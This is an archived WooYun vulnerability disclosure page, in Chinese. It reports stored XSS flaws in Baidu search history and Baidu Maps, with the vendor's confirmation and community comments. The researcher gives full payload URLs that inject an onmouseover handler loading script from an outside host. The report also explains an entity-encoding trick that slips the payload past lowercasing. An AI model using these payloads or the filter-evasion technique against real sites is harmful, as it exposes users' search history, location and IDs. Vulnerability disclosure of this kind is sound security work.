百度搜索存储型XSS漏洞 | wooyun-2014-073801| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073801

漏洞标题：百度搜索存储型XSS漏洞

漏洞作者： q601333824

提交时间：2014-08-25 17:37

修复时间：2014-10-09 17:38

公开时间：2014-10-09 17:38

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-25：细节已通知厂商并且等待厂商处理中
2014-08-25：厂商已经确认，细节仅向厂商公开
2014-09-04：细节向核心白帽子及相关领域专家公开
2014-09-14：细节向普通白帽子公开
2014-09-24：细节向实习白帽子公开
2014-10-09：细节向公众公开

简要描述：

百度搜索存储型XSS漏洞

详细说明：

1.在百度搜索的东西，会在百度个人中心留下搜索历史记录
2.所以我在百度搜索

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22

3.在个人中心会留下记录，会出现XSS漏洞，如图

4.上面连接，会把大写字母转换到小写字母，控制台会报错,如图

5.因为下面图上两个本来应该大写的字母变成小写字母了

6.所以要把大写B和大写C，转码之就不会报错了

B → &#66; → %26%2366%3b

C → &#67; → %26%2367%3b

-----------------------------------------------------------------------------------

7.这个是self XSS吗？？百度搜索每天用的人那么多，如果乱七八糟的网站，强制你搜索这段代码，就不是跨自己了.如果网站这样呢，如图

------------------------------------------------------------------------------------------
8.这里顺便也提交个百度地图另外一边的XSS漏洞，就不会废话了，直接上连接

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5

9.访问之后把鼠标移到左边就会获取地理位置和用户ID

漏洞证明：

1.百度个人中心XSS代码

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22

2.百度地图XSS

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5

修复方案：

百度个人中心虽然无法获取到cook,但是可以获取用户的搜索历史记录，百度地图虽然获取不到cook,但是可以获取ID对应所在地点
1.百度个人中心因为双引号被过滤，百度地图因为单引号没过滤,百度地图，前两次修复，只是修复了输出点，不是我吹牛，治标不治本，过滤方式会导致出现同样的问题

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-08-25 21:52

厂商回复：

感谢提交，我们已联系业务部门处理此问题。

漏洞评价：

2014-08-25 17:56 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

你关注的白帽子 q601333824 发表了漏洞百度搜索存储型XSS漏洞
2014-08-25 18:01 | 浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

你关注的白帽子 q601333824 发表了漏洞百度搜索存储型XSS漏洞
2014-08-26 08:51 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

你关注的白帽子 q601333824 发表了漏洞百度搜索存储型XSS漏洞
2014-08-29 08:04 | 天际 ( 路人 | Rank:3 漏洞数:1 | 我只是在打酱油)

你关注的白帽子 q601333824 发表了漏洞百度搜索存储型XSS漏洞
2014-10-02 21:28 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天，我会骑着雨牛@'雨。踩着一哥@jan...)

你email多少？
2014-10-09 18:26 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

表示没处理掉
2014-10-09 18:30 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

@鱼化石后来用新号查看，那个功能是关闭状态，没开的，毕竟有点鸡肋，记录浏览记录的功能感觉没多少人用
2014-10-09 20:24 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

@q601333824 漠漠开着那学习了有价值
2014-10-10 00:36 | 苍崎深雪 ( 路人 | Rank:3 漏洞数:2 | 微光)

我看到了fripSide！
2014-10-11 09:13 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

地图这个有点意思，可以定位
2014-10-25 21:20 | 大漠長河 ( 实习白帽子 | Rank:43 漏洞数:7 | ̷̸̨̀͒̏̃ͦ̈́̾( 天龙源景区欢迎您...)

拿走学习用
2015-04-26 15:16 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ：867597730，百度贴吧ID：昌维001)

问题是有多少人会去闲的没事看自己的搜索记录。=_=

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073801

漏洞标题：百度搜索存储型XSS漏洞

相关厂商：百度

漏洞作者： q601333824

提交时间：2014-08-25 17:37

修复时间：2014-10-09 17:38

公开时间：2014-10-09 17:38

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073801

漏洞标题：百度搜索存储型XSS漏洞

相关厂商：百度

漏洞作者： q601333824

提交时间：2014-08-25 17:37

修复时间：2014-10-09 17:38

公开时间：2014-10-09 17:38

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-073801"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 q601333824@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：